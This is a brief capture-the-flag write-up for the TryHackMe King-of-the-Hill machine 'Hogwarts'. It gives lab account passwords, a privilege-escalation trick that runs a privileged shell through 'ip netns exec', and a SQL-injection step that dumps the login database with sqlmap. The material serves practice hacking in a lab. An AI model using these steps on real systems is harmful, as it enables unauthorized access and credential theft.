Hogwarts

TryHackMe KoTH Machine - Hogwarts

Via ftp we'll get pass for neville

username: neville
password: 5s1mg3lt0l4nhyaprzu@nnslx

Privilege Escalation user neville

1. ip netns add foo
2. ip netns exec foo /bin/sh -p

Sql injection vuln on a port with login form:

capture the req using burp

sqlmap -r req.txt --dump --threads 10

You'll get hermoine pass

username: hermoine
password: x5jz99#2wv9mzasd6#jybweo0

+----------+---------------------------+
| user     | password                  |
+----------+---------------------------+
| hermoine | x5jz99#2wv9mzasd6#jybweo0 |
+----------+---------------------------+

PreviousHackers NextLion

Last updated 7 months ago